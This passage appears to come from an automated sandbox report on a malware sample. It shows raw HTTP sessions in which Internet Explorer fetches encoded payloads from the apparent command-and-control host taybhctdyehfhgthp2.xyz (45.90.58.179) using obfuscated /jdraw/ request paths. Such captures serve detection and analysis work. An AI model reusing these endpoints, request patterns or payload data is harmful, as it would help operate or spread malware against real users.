35 58 36 7a 51 72 71 57 43 47 47 45 69 77 4c 5a 51 4c 45 78 76 6a 63 76 4a 35 2b 55 6c 77 36 4a 57 38 73 32 39 73 37 34 6b 63 38 56 6f 42 78 30 68 74 36 57 56 64 70 62 59 30 30 63 44 66 76 5a 6c 71 50 5a 45 79 44 6a 75 54 68 38 30 67 77 61 4d 30 52 54 67 69 31 79 61 78 2f 44 41 4b 34 30 63 59 37 57 6e 72 64 2f 53 6e 66 64 30 6d 51 68 62 65 6d 48 32 6d 63 73 53 43 45 44 6c 56 32 47 69 59 50 6c 46 6e 6f 6a 7a 38 56 79 53 52 7a 5a 75 42 34 39 6e 6a 76 38 54 76 72 69 37 48 65 57 53 52 6e 49 33 73 47 51 76 45 6a 37 42 4c 33 54 48 55 48 2f 4e 48 58 51 4c 45 4e 4f 71 5a 6b 49 63 78 4a 51 43 71 78 4c 48 6a 6f 66 61 58 65 47 4c 38 64 49 49 52 45 32 4a 32 33 63 4b 4e 72 2f 32 56 34 74 63 66 44 79 31 52 59 4a 2b 2b 6d 74 Data Ascii: ehXldSwXQiYLaGznQN5YF7r3L/efOLb4LnZ1oAYpt8lgPGPe/gf8/DGTbV6m7YwpUR3MWo2UtKdDmF4APCFraJREwlJWnkob8SsQNJhrywvKqw+bSooHYuwlIBknOdspX9EQe3Sv9e+MJGzBUV0haEDba0XAkObuDYNRj18xnNiXi6Ws60Pjc0/HU0i9bLRpRg59STkUqFGs8C412H1xVdmc5d2vrrw1W726xdxLJbB5PrYiPoMAP1YN9P+KYzmlOVGKeIvfiKydN7axyUq5/wpgASG+/0qOAa0oeSh5Q6z4Le91X7o42jmOQniSwc/AnYfllgEL+XZ/ioUYNibJVoXD6eiXOl7MOKapy1Bb+Gywzy8tPZj4TkzOg/kDolCzmKs3PubHLAB4ejQED/8fQQkFq9PAiYxupDnUiCXg97vAQBuSJsFj9k7SbQf5lrUFT29oPXWAFO+ivI9TLVS6GM5V1VQ73JFz40H8W5j3mKDs+Lk9/ypNSQRbEAitmI0L69v/OpyCZfw2bLr3UMjyQ6jc472uRTBjluktYuJKtOxml0kFaM5OQHanCKUFUD0ZEr41ObMHgfTLA+GVQAC2M4i6oRXb3/FD7O7q6IqnunU3W6xo6FkkwxMwFa93TzbI5lU6uYnY+kLYRQbyTFV3ZmIpNpu/tzPA2ZAkN2SJtaTfMObqgWeiIVWZDI6YZ4PeoYVGVPTxVo9zVWe5X6zQrqWCGGEiwLZQLExvjcvJ5+Ulw6JW8s29s74kc8VoBx0ht6WVdpbY00cDfvZlqPZEyDjuTh80gwaM0RTgi1yax/DAK40cY7Wnrd/Snfd0mQhbemH2mcsSCEDlV2GiYPlFnojz8VySRzZuB49njv8Tvri7HeWSRnI3sGQvEj7BL3THUH/NHXQLENOqZkIcxJQCqxLHjofaXeGL8dIIRE2J23cKNr/2V4tcfDy1RYJ++mt
Jul 6, 2021 14:31:35.547055006 CEST	12768	IN	Data Raw: 2f 6d 64 72 5a 4a 47 75 36 31 4b 37 74 5a 74 30 79 51 6c 58 53 37 4b 38 53 4b 74 6e 45 4a 6a 65 69 7a 6b 69 59 77 63 42 30 55 65 5a 56 6c 67 71 65 6f 31 2f 38 6b 75 56 41 30 4e 6a 54 76 47 4d 4e 32 33 46 43 2b 4d 33 69 6c 31 54 38 6e 37 5a 4b 63 Data Ascii: /mdrZJGu61K7tZt0yQlXS7K8SKtnEJjeizkiYwcB0UeZVlgqeo1/8kuVA0NjTvGMN23FC+M3il1T8n7ZKc44+djUayVI/op4pJ2ho/CgevvltNpiydA977+rhfW6qecYF914GIkD9lL43w6g+RXlEv+VNofGPOWkUwHp7NgmX1EkmzF5VnbiLDzjYsV2HAvW2rLUmnY3H25wJTXtvITM/t3mZlF6iCRMebU+R8vWKKFlRWRZp5A
Jul 6, 2021 14:31:35.547079086 CEST	12768	IN	Data Raw: 57 6b 45 72 38 4a 4f 4a 6e 52 57 51 4b 52 50 6b 73 42 78 6b 30 2f 4b 57 6b 6b 66 68 34 72 47 33 2f 78 55 75 6f 43 47 55 6b 6e 79 46 59 5a 77 6f 68 4f 68 6a 31 6f 50 4d 34 52 45 51 71 30 68 33 42 71 41 6c 79 77 69 7a 4c 76 65 70 56 63 41 47 57 4b Data Ascii: WkEr8JOJnRWQKRPksBxk0/KWkkfh4rG3/xUuoCGUknyFYZwohOhj1oPM4REQq0h3BqAlywizLvepVcAGWKJApsZZyB9AscV1drNtOwZXQUFcZy2nBHw6ngXHL/FywHGyCnITp2zY1z6Rxv1cXaqlTP6cdmRpLZyx3g=

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49866	45.90.58.179	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jul 6, 2021 14:30:49.579442024 CEST	10097	OUT	GET /jdraw/senUH03QWJY9zy0TGKst3cx/OBC4WplDXH/oqcxDz6cjN7h_2F8d/LfQkFQ_2Fy0T/FAoEVOXxiKp/e5g4BIHVUHnefb/KqKdZd97vSsTK6buJ9MPp/9jx2EzrYaeeWP1ma/erE06KdAoUvLcED/U3KE1nRYvwMMSqnPv9/1aDo6f8tR/MrfKrfcn0yaSbhv8m_2F/z2V0PdyA0_2FVLnznN3/BN9K6zV1nJnb/WmUYG.crw HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: taybhctdyehfhgthp2.xyz Connection: Keep-Alive
Jul 6, 2021 14:30:49.649101973 CEST	10099	IN	HTTP/1.1 200 OK Date: Tue, 06 Jul 2021 12:30:49 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Set-Cookie: PHPSESSID=oj5lijodqe611lf3pm8jatk5p5; path=/; domain=.taybhctdyehfhgthp2.xyz Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: lang=en; expires=Thu, 05-Aug-2021 12:30:49 GMT; path=/; domain=.taybhctdyehfhgthp2.xyz Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 33 61 35 63 30 0d 0a 54 37 50 43 46 2b 46 31 4a 55 4b 41 54 62 62 73 6b 6e 55 32 76 58 53 4c 57 30 70 45 54 4a 56 69 7a 51 2b 44 68 35 45 4d 66 73 37 78 45 66 79 46 33 4b 48 51 69 53 71 48 7a 55 68 43 2b 65 4f 65 34 78 4f 6d 6b 74 78 46 38 68 6b 49 4e 50 41 79 47 77 74 4c 75 78 6a 7a 51 55 58 30 64 4f 6c 78 52 68 6c 32 49 79 4d 71 6a 6c 52 6b 53 79 56 4f 65 72 75 63 56 6c 49 33 75 36 35 62 70 6a 30 4f 6d 52 76 43 57 47 38 4a 71 2b 4c 33 74 4a 74 4f 76 31 74 42 74 47 5a 58 5a 42 6c 75 79 32 70 34 54 56 54 57 67 70 50 7a 4f 51 77 76 6d 30 72 68 56 73 4f 48 62 78 44 4b 4c 7a 6b 59 36 4d 50 32 52 32 47 70 50 39 78 71 42 52 46 34 67 7a 30 48 74 53 4d 58 6a 77 44 4e 77 71 46 63 49 32 34 46 62 2b 31 2b 64 73 65 35 69 4c 44 66 51 79 42 35 71 37 33 61 6d 39 61 52 67 36 74 75 43 71 65 53 47 50 4e 64 75 30 44 6f 72 43 2b 65 36 35 37 42 6b 32 69 57 66 4b 4e 72 45 4a 47 34 33 76 4a 4e 2b 68 45 30 6f 4c 37 69 76 34 31 4c 50 36 37 33 61 4b 41 35 6c 33 62 49 48 6f 46 77 4c 30 4f 78 37 6a 69 48 37 5a 36 52 4e 61 37 42 2b 38 42 66 6d 34 51 42 66 4e 31 68 30 55 35 75 47 73 65 68 71 78 7a 56 48 33 46 65 44 77 4f 6b 42 7a 75 43 39 6a 62 4a 7a 77 4c 4b 38 61 2b 6a 49 67 51 53 4a 52 6d 4d 54 43 72 32 33 79 67 67 46 4d 42 75 6b 39 34 32 4c 57 52 45 46 4a 79 58 57 32 52 65 47 61 38 61 63 75 79 7a 54 36 55 57 5a 35 68 4f 58 6e 79 58 54 43 46 61 39 48 76 4c 71 72 56 36 41 74 56 6c 78 62 34 46 37 34 49 51 63 79 50 6f 36 4d 4a 2f 58 6c 74 57 52 6e 44 66 55 61 4d 62 6f 4e 6d 51 58 41 70 4c 56 39 49 4a 66 4a 74 36 50 55 37 7a 66 78 59 37 48 46 4d 4c 68 59 49 62 7a 61 61 43 75 63 71 58 57 33 61 77 6b 30 4e 44 31 54 30 6e 36 4e 36 59 35 57 44 44 6f 69 4e 7a 4b 64 51 4a 4b 69 6e 48 2f 4b 73 4b 32 71 2f 30 2b 34 69 53 42 31 53 33 63 50 35 4a 77 31 54 48 77 4f 45 37 74 6b 77 54 71 71 2f 6b 4e 33 65 63 37 64 6d 38 75 47 30 70 4c 64 2b 63 69 4d 6d 42 68 44 41 31 4c 78 69 6c 53 72 6a 36 6d 64 6f 45 70 6f 55 7a 68 51 30 63 49 6b 69 59 7a 6e 4c 49 4f 41 75 4b 4c 4a 76 43 78 39 4b 32 6c 2f 70 58 35 76 68 52 47 45 49 34 57 69 4b 6d 73 33 34 4e 76 78 44 77 31 42 72 70 70 65 48 66 71 36 6d 35 62 5a 4a 2b 6a 47 6e 57 51 33 56 54 43 39 68 70 2b 7a 62 30 6b 50 51 41 4a 38 61 6f 6d 73 4b 35 45 4d 4b 41 6a 38 75 65 45 4f 70 66 79 6e 54 53 6b 4c 68 61 52 43 6b 5a 31 48 65 2f 34 59 7a 4e 38 41 58 31 Data Ascii: 3a5c0T7PCF+F1JUKATbbsknU2vXSLW0pETJVizQ+Dh5EMfs7xEfyF3KHQiSqHzUhC+eOe4xOmktxF8hkINPAyGwtLuxjzQUX0dOlxRhl2IyMqjlRkSyVOerucVlI3u65bpj0OmRvCWG8Jq+L3tJtOv1tBtGZXZBluy2p4TVTWgpPzOQwvm0rhVsOHbxDKLzkY6MP2R2GpP9xqBRF4gz0HtSMXjwDNwqFcI24Fb+1+dse5iLDfQyB5q73am9aRg6tuCqeSGPNdu0DorC+e657Bk2iWfKNrEJG43vJN+hE0oL7iv41LP673aKA5l3bIHoFwL0Ox7jiH7Z6RNa7B+8Bfm4QBfN1h0U5uGsehqxzVH3FeDwOkBzuC9jbJzwLK8a+jIgQSJRmMTCr23yggFMBuk942LWREFJyXW2ReGa8acuyzT6UWZ5hOXnyXTCFa9HvLqrV6AtVlxb4F74IQcyPo6MJ/XltWRnDfUaMboNmQXApLV9IJfJt6PU7zfxY7HFMLhYIbzaaCucqXW3awk0ND1T0n6N6Y5WDDoiNzKdQJKinH/KsK2q/0+4iSB1S3cP5Jw1THwOE7tkwTqq/kN3ec7dm8uG0pLd+ciMmBhDA1LxilSrj6mdoEpoUzhQ0cIkiYznLIOAuKLJvCx9K2l/pX5vhRGEI4WiKms34NvxDw1BrppeHfq6m5bZJ+jGnWQ3VTC9hp+zb0kPQAJ8aomsK5EMKAj8ueEOpfynTSkLhaRCkZ1He/4YzN8AX1
Jul 6, 2021 14:30:49.649135113 CEST	10100	IN	Data Raw: 6b 50 45 73 4c 2b 71 47 41 69 41 6c 51 50 45 54 62 4c 65 72 36 48 61 2b 76 66 77 69 5a 50 34 41 58 55 33 77 49 42 45 62 78 48 72 67 6e 4e 2f 47 67 38 66 36 33 47 6d 33 38 42 66 52 68 50 77 59 39 6a 79 47 52 34 42 56 50 35 78 39 4a 66 43 32 35 6f Data Ascii: kPEsL+qGAiAlQPETbLer6Ha+vfwiZP4AXU3wIBEbxHrgnN/Gg8f63Gm38BfRhPwY9jyGR4BVP5x9JfC25oat/nW5N9hsZK4H3odqROuDY1SLvkBdWreTBxuU7rg4+ElAElRzRpH7cgRPr2JzG5yQU6U48Q1okD1LB3zkfFgtMF5ohCVpr8MT7Qu4QP8snPprFkRnteN1q4kSkhMQxN/P4DqRE/nTEqAHLHAl2+ELmI3QRBRGNjS
Jul 6, 2021 14:30:49.649157047 CEST	10101	IN	Data Raw: 6e 55 7a 2f 51 6c 35 30 4f 62 70 64 58 65 68 58 49 76 6b 77 37 63 57 6f 42 68 78 37 4b 50 57 73 41 57 5a 66 74 44 6e 75 53 78 4a 65 42 37 49 6e 50 2f 67 39 33 35 36 7a 6d 4d 66 63 6c 45 59 2b 34 44 6f 53 41 59 6e 43 30 49 77 39 6b 35 64 63 78 37 Data Ascii: nUz/Ql50ObpdXehXIvkw7cWoBhx7KPWsAWZftDnuSxJeB7InP/g9356zmMfclEY+4DoSAYnC0Iw9k5dcx7c4PmTiY1ajlq2t9vRwUcbxUz24xzpnXKZNRd03qO2uL7or7NV5zDgowTY7+RzqoUlgcuhEmXc7E9GPFMo3k7QUXblq9wSH9crtBlhlp8RPUsdPEYmuceXVu+esLPGh+nwaeoYa9F0RRuPS0PqjpmQwz5IOtrM01fp
Jul 6, 2021 14:30:49.649182081 CEST	10103	IN	Data Raw: 30 30 50 72 68 67 47 50 32 57 74 79 55 6f 35 71 30 68 38 37 59 4d 75 44 52 6c 54 6f 45 6c 57 6c 2f 34 42 74 7a 74 59 32 4f 4d 4e 50 56 51 39 59 39 55 7a 63 65 61 4b 30 33 48 6c 6f 44 38 36 66 4e 4e 4a 41 36 64 58 39 45 72 57 56 63 30 74 67 64 44 Data Ascii: 00PrhgGP2WtyUo5q0h87YMuDRlToElWl/4BtztY2OMNPVQ9Y9UzceaK03HloD86fNNJA6dX9ErWVc0tgdD9H5e0NDtk9Hxav/iooOe084j8V2M1b5u5ziCvuLQIenima5KeM/qWW5SGBMycp5BU00VAdZREIhLQChw5t7soWh/U64gRyMyqdg6v7D1m1kV9RiREf9CgFVnhp9Lyj/7rPLu/YOAK9OBeX+TCmthj9THQDbm6AEHX
Jul 6, 2021 14:30:49.649204969 CEST	10104	IN	Data Raw: 6a 68 63 64 39 45 64 46 63 4d 50 78 44 42 36 30 75 6b 4d 68 69 74 51 6f 64 69 39 43 48 41 37 55 5a 67 78 6f 56 70 7a 62 32 47 42 61 49 66 53 35 79 39 75 31 43 59 68 64 4a 77 5a 55 6a 4e 4b 63 57 58 48 5a 48 4d 5a 72 50 57 70 56 49 46 6f 6d 64 33 Data Ascii: jhcd9EdFcMPxDB60ukMhitQodi9CHA7UZgxoVpzb2GBaIfS5y9u1CYhdJwZUjNKcWXHZHMZrPWpVIFomd38Oi0wetqxKM2Z1qSTtYsrlyatosY7r+tJQuGvdxwvbZv9pIG2sQjh2GKXjb999JTA4iHSlrgfDioUR0KW7OEhUNRJm/OCtUdFDnipY2Aaprwpl9+7ZW15tXcEyFbRsdg0TcVlzz5EJedHsxXCxKws+u7BoClFh+YN
Jul 6, 2021 14:30:49.649224043 CEST	10106	IN	Data Raw: 69 77 4e 73 6f 75 6e 70 35 47 44 62 53 53 37 39 34 43 41 65 79 6c 54 61 48 34 72 41 34 4d 43 66 79 4b 6f 77 36 42 67 75 6a 6e 4a 79 44 45 30 34 34 4c 4d 57 65 6c 42 48 66 58 53 6e 4f 74 49 44 65 7a 74 4e 32 33 48 79 42 6c 50 37 59 44 31 6a 75 51 Data Ascii: iwNsounp5GDbSS794CAeylTaH4rA4MCfyKow6BgujnJyDE044LMWelBHfXSnOtIDeztN23HyBlP7YD1juQsfsP/wjfo0ggmq/KG9eMUr+SCd5o6CtiDa4jN8Am/q1grE1REReIgVRQWGcwG1kH+cQ8pNmjJMy/ndzZAcLvFADKTEvZpkBv/HF0xVkIxB/cnRrT1QZKc8CBJP/bsKuedwuC6FlTFr2Gv4AsLjS0GaQWxZTKYhAcd
Jul 6, 2021 14:30:49.649244070 CEST	10107	IN	Data Raw: 7a 48 6b 48 46 4e 73 5a 34 33 77 36 6d 52 74 50 55 44 53 6d 56 48 68 37 4d 4e 33 5a 73 6e 33 42 42 70 33 4f 4e 6d 5a 55 52 72 4a 4f 78 45 32 52 4f 41 33 4e 69 43 54 50 6e 43 39 67 6c 39 62 69 45 52 48 4a 51 74 43 69 72 55 6b 33 50 32 5a 41 65 66 Data Ascii: zHkHFNsZ43w6mRtPUDSmVHh7MN3Zsn3BBp3ONmZURrJOxE2ROA3NiCTPnC9gl9biERHJQtCirUk3P2ZAefqi6M2X+JX0x1iACbEZG0Qloh5sQ6jLmiNixu7kqoTdnWgrSujeAmUqISZz1AclAn4TSSjjiQsjhKPgcl/PRSUTwhEEZPXBXRuIjYgu6du2ic4cXgHk9YMe+cUFSwrD/+87DXf5YFDb0FzhESkQUzM40FEER/nLBcw
Jul 6, 2021 14:30:49.649261951 CEST	10108	IN	Data Raw: 68 78 5a 68 53 68 31 72 78 2b 51 4b 30 4b 45 38 39 30 43 63 46 70 6f 41 76 38 37 71 58 74 4b 49 42 63 67 66 53 62 78 70 4f 6d 56 72 54 41 34 62 75 55 42 31 76 72 76 38 53 44 5a 6c 30 63 75 4a 48 42 35 43 41 50 4f 33 42 78 66 4c 4a 46 72 6e 6b 36 Data Ascii: hxZhSh1rx+QK0KE890CcFpoAv87qXtKIBcgfSbxpOmVrTA4buUB1vrv8SDZl0cuJHB5CAPO3BxfLJFrnk60cl6YuYwdPX8vSHDobtR8uQlLVsTAy9P5o2Hs0c4mWLUTwyCjm/nDltzkM9y342ESrGOgjti//Ew/VzPv30n0xH13p0p63v/RyiUCUS56laZcVrihz2/iLeZ8K67LdKUadvkZBVoUtkMeBxoqDhv6sVy/ukK2tJ5M
Jul 6, 2021 14:30:49.649282932 CEST	10110	IN	Data Raw: 49 34 5a 4f 69 78 4f 58 78 42 38 52 77 67 63 2f 7a 68 4d 4f 31 61 4a 36 33 71 55 56 7a 73 5a 38 78 73 4b 65 4b 4d 47 6c 4d 48 63 54 53 6b 68 4d 47 59 75 57 4e 6a 2b 74 6f 6d 31 38 50 6e 42 39 56 78 58 63 4d 6c 54 59 6d 7a 4f 45 6e 2f 69 72 44 59 Data Ascii: I4ZOixOXxB8Rwgc/zhMO1aJ63qUVzsZ8xsKeKMGlMHcTSkhMGYuWNj+tom18PnB9VxXcMlTYmzOEn/irDYHalw8nDX3U6903Guakmp7IKgz8eDzgwpQph4MZEIzwwCcNaRxtOu8+RN9ZwIDAETY8r9neehoiUXofseuvUlZXAWHuZW6OlXB57CoYxEEsusGVzJkLjL4pIKT6E6o8A6Muv0ieu1z8Lvid0l2kWyVBpQkWVa3s5md
Jul 6, 2021 14:30:49.649302959 CEST	10111	IN	Data Raw: 31 57 53 68 7a 75 44 50 37 55 63 5a 49 56 71 76 4a 57 39 6f 4a 37 79 41 2b 4d 4d 75 30 54 76 56 38 4c 6f 51 30 42 34 56 47 66 5a 31 4d 49 63 54 49 76 6a 61 61 4f 44 68 4d 50 34 35 32 4c 71 61 6a 4b 53 39 6a 61 78 53 35 32 5a 68 49 61 48 33 36 54 Data Ascii: 1WShzuDP7UcZIVqvJW9oJ7yA+MMu0TvV8LoQ0B4VGfZ1MIcTIvjaaODhMP452LqajKS9jaxS52ZhIaH36TbUl9N28p22EBmhasIcKfJj0XKtf+gAiYQJeGpQ6gOdfjAe6agghQtjTp9u1YsMfb57VHAxS0DI/U5+9hg+2pU6iD++AsPRQnRvxHuwuudA1BrGhbSYKUBAbYz5nh4V/OrjqipKEtSxBld0PUhLaV+yCkstEoyH72H
Jul 6, 2021 14:30:49.688613892 CEST	10112	IN	Data Raw: 59 72 50 39 6c 71 43 77 65 49 5a 48 4e 31 77 70 78 4e 56 65 65 5a 6b 71 41 52 6b 34 6a 72 31 6d 32 4a 39 6f 33 6e 68 33 6d 50 34 77 55 55 42 75 62 6b 55 67 48 71 36 62 6c 62 6d 4d 75 6d 42 65 4a 59 50 43 35 47 2f 31 35 38 36 2b 6b 78 4a 76 58 6b Data Ascii: YrP9lqCweIZHN1wpxNVeeZkqARk4jr1m2J9o3nh3mP4wUUBubkUgHq6blbmMumBeJYPC5G/1586+kxJvXkTGd8vaYw9ts6VtcGSiWpyelHc+Y9g6C/t5r8tw8lOQ65LXuxgoOPlTmg9WR4dlZzOJ/78RquRKS7bPMFf7E1Jtw1qnuBuiiqvQqWABFPi0K0Ss4mSmanuzlzn6NGqfHc5Wbg8VmeCTUNIx58PthVZGn/MTHjT3H7T
Jul 6, 2021 14:30:50.068135977 CEST	10346	OUT	GET /favicon.ico HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: taybhctdyehfhgthp2.xyz Connection: Keep-Alive Cookie: PHPSESSID=oj5lijodqe611lf3pm8jatk5p5; lang=en
Jul 6, 2021 14:30:50.106596947 CEST	10347	IN	HTTP/1.1 200 OK Date: Tue, 06 Jul 2021 12:30:50 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 Last-Modified: Tue, 15 Jun 2021 10:54:44 GMT ETag: "1536-5c4cbcd3c238b" Accept-Ranges: bytes Content-Length: 5430 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: image/vnd.microsoft.icon Data Raw: 00 00 01 00 02 00 10 10 00 00 00 00 20 00 68 04 00 00 26 00 00 00 20 20 00 00 00 00 20 00 a8 10 00 00 8e 04 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9c 87 73 f7 9c 87 73 f9 9c 87 73 f7 9c 87 73 77 9c 87 72 03 ff ff ff 01 9c 87 73 09 9c 87 73 0f 9c 87 73 0d 9b 87 73 05 ff ff ff 01 9c 87 73 15 9c 87 73 c7 9c 87 73 f9 9c 87 73 f9 9c 87 73 85 9c 87 73 f9 9c 87 72 f9 9c 87 73 7b 9c 87 73 05 9c 87 73 23 9c 87 73 7f 9c 87 73 c3 9b 87 72 d3 9c 87 73 cf 9c 87 73 ad 9c 87 73 5b 9c 87 73 0d 9c 87 73 1b 9c 87 73 c5 9b 87 73 ff 9c 87 73 85 9c 87 73 f7 9c 87 73 7d 9c 87 73 07 9c 87 73 57 9c 87 72 db 9c 87 73 ab 9c 87 73 6d 9c 87 73 4b 9c 87 73 43 9c 87 73 77 9c 87 73 cf 9c 87 73 b7 9b 86 73 25 9c 87 73 21 9c 87 73 cb 9c 87 73 87 9c 87 73 7f 9c 87 73 05 9c 87 73 55 9c 87 73 e1 9c 87 73 59 9c 87 73 81 9c 87 73 df 9c 87 73 c9 9b 86 72 23 ff ff ff 01 9c 87 73 13 9c 87 73 97 9c 87 73 cd 9c 87 73 19 9c 87 72 25 9c 87 73 5b 9c 87 73 03 9c 87 73 1d 9c 87 73 d9 9c 87 73 5d 9c 87 73 0b 9b 87 72 ef 9c 87 73 53 9b 87 73 bf 9c 87 73 71 ff ff ff 01 ff ff ff 01 9c 87 73 0b 9c 87 73 a5 9c 87 73 95 9c 87 73 03 9c 87 73 03 ff ff ff 01 9c 87 73 75 9c 87 73 b5 9c 87 73 07 ff ff ff 01 9c 87 73 c1 9c 87 73 db 9c 87 73 e7 9c 87 73 41 ff ff ff 01 ff ff ff 01 ff ff ff 01 9c 86 73 25 9b 87 73 d9 9c 87 73 23 ff ff ff 01 9c 87 72 07 9c 87 72 bb 9c 87 73 5d ff ff ff 01 ff ff ff 01 9c 87 73 1b 9c 87 73 db 9c 87 73 6b 9c 87 73 03 9c 87 73 03 ff ff ff 01 ff ff ff 01 9c 87 73 03 9c 87 73 af 9c 87 73 5d ff ff ff 01 9c 87 73 0d 9c 87 72 cd 9c 87 73 37 ff ff ff 01 ff ff ff 01 9c 86 73 09 9c 87 73 c9 9c 87 72 91 9c 86 72 a3 9c 87 73 81 9c 86 72 05 ff ff ff 01 ff ff ff 01 9b 87 73 85 9c 87 73 7f ff ff ff 01 9c 87 73 0d 9c 87 73 cb 9b 87 73 37 ff ff ff 01 ff ff ff 01 9c 87 73 09 9c 87 73 cd 9c 87 73 69 9c 87 73 3f 9c 87 73 37 9c 87 73 13 ff ff ff 01 ff ff ff 01 9b 87 73 83 9c 87 73 7f ff ff ff 01 9c 87 73 07 9c 87 73 b9 9c 87 72 57 ff ff ff 01 ff ff ff 01 9c 87 73 09 9c 87 73 c9 9c 87 73 97 9c 87 73 a9 9c 87 73 a9 9c 87 73 97 ff ff ff 01 ff ff ff 01 9c 87 73 ab 9c 87 73 5b ff ff ff 01 ff ff ff 01 9c 87 73 73 9c 87 73 ad 9c 87 73 05 ff ff ff 01 9c 87 73 09 9c 87 73 cd 9c 87 73 6d 9c 87 73 49 9c 87 73 3b 9c 87 73 07 ff ff ff 01 9c 87 73 21 9c 87 73 d3 9c 87 73 23 ff ff ff 01 9c 87 73 05 9c 87 73 1b 9b 87 73 d3 9c 87 73 51 ff ff ff 01 9b 86 73 09 9c 87 73 cb 9c 87 73 89 9b 87 72 83 9c 87 73 6d 9c 87 73 05 9c 87 72 07 9c 87 73 97 9b 87 72 91 9c 87 73 03 9c 87 73 05 9b 87 72 89 9c 87 73 07 9c 87 73 51 9c 87 73 d9 9c 87 72 4b 9c 87 73 07 9c 87 73 67 9c 86 73 27 ff ff ff 01 ff ff ff 01 9b 86 73 0d 9c 87 73 81 9c 87 73 c5 9c 87 73 17 9c 87 73 27 9c 87 73 5f 9c 87 73 f7 9c 87 73 85 9c 87 73 09 9b 87 72 51 9c 87 73 d3 9c 87 73 9d 9c 87 73 4b 9c 86 72 2f 9c 87 73 33 9c 87 73 61 9c 87 73 bd 9b 87 73 b1 9c 87 73 21 9c 87 73 23 9c 87 73 cd 9c 87 73 87 9c 87 73 f9 9c 86 73 f9 9c 87 73 83 9c 87 73 07 9c 87 73 1f 9c 87 73 79 9c 87 73 b9 9c 87 72 c5 9c 87 73 c3 9c 87 72 a7 9c 87 73 55 9c 87 72 0b 9c 87 73 1d 9c Data Ascii: h& ( @sssswrssssssssssrs{ss#ssrsss[sssssss}ssWrssmsKsCswsss%s!sssssUssYsssr#ssssr%s[ssss]srsSssqssssssussssssAs%ss#rrs]sssksssss]srs7ssrrsrsssss7sssis?s7sssssrWssssssss[sssssssmsIs;ss!ss#ssssQsssrsmsrsrssrssQsrKssgs'sssss's_sssrQsssKr/s3sasss!s#ssssssssysrsrsUrs

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.4	49868	45.90.58.179	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jul 6, 2021 14:30:52.271142960 CEST	10391	OUT	GET /jdraw/nCtz8Lq6aEDL_2BsA7Qn5/Dev5sCookYywtQ9z/nG7suU6eaLynJDf/6nVlQrTedw14SsFLaP/dONDpCANh/eFyKJLQSVfXFPwoYfc_2/Fxcw2VZX7ufzKzV_2B_/2BcmZDAxHE9PqdJN_2FqrA/xpLUjN90HazXC/umw6oByt/_2BMDLnSdL9xoOnOquolygh/AYKttn5cY4/7XRs5_2FBpnYMuiL1/LLL0Aa3xG7M/waJBx6.crw HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: taybhctdyehfhgthp2.xyz Connection: Keep-Alive Cookie: lang=en; PHPSESSID=oj5lijodqe611lf3pm8jatk5p5
Jul 6, 2021 14:30:52.327635050 CEST	10392	IN	HTTP/1.1 200 OK Date: Tue, 06 Jul 2021 12:30:52 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 34 61 33 31 34 0d 0a 67 72 57 41 4c 4a 30 41 6f 52 72 79 4d 68 4c 6b 62 34 2b 35 66 4b 46 31 42 54 33 44 6c 56 75 33 6a 75 7a 45 48 61 77 2f 5a 76 53 45 53 6d 51 76 58 51 38 6e 6b 70 30 59 39 52 6b 64 57 67 69 7a 31 69 4f 4b 31 44 38 4e 55 72 39 69 5a 64 73 64 46 72 38 31 4a 6d 70 57 67 39 74 78 6e 64 7a 56 47 54 30 65 36 2b 54 42 59 51 45 66 63 65 50 51 59 6e 6f 75 51 33 6e 45 5a 54 63 44 75 52 54 63 56 56 4b 70 34 4d 76 79 6f 41 45 37 36 67 44 5a 59 5a 62 31 55 37 54 4f 36 67 57 46 35 78 47 61 45 59 44 50 52 68 58 36 4b 75 42 45 44 4c 6e 70 4b 4a 59 4e 78 6e 5a 2f 70 73 6b 35 5a 2f 78 69 72 55 51 75 71 72 35 6e 51 38 64 43 77 62 76 6e 49 61 2f 44 67 44 59 66 35 43 6a 67 64 73 77 6b 67 72 72 48 6f 34 71 30 37 6d 36 41 65 39 6d 42 2b 53 46 34 4c 36 71 4d 35 56 2b 67 77 30 61 33 4c 70 65 4b 54 75 57 53 79 33 31 6c 6f 76 6f 31 38 44 36 63 43 5a 49 66 4e 4d 30 79 4d 73 41 71 51 6a 78 44 57 30 59 61 53 79 56 65 4d 54 6a 75 36 74 76 76 59 79 35 6d 55 62 75 73 61 70 37 57 49 6d 41 57 6d 61 67 48 4b 6e 30 51 43 52 59 52 33 37 64 49 32 6e 73 70 58 31 44 4f 52 73 2b 31 35 51 62 71 62 4c 4f 77 73 67 4c 63 64 66 65 56 36 6b 77 63 48 44 68 64 34 70 4d 4c 4c 70 73 31 71 6c 41 49 53 4f 52 51 52 32 4b 34 44 36 4a 59 6c 38 58 71 31 4f 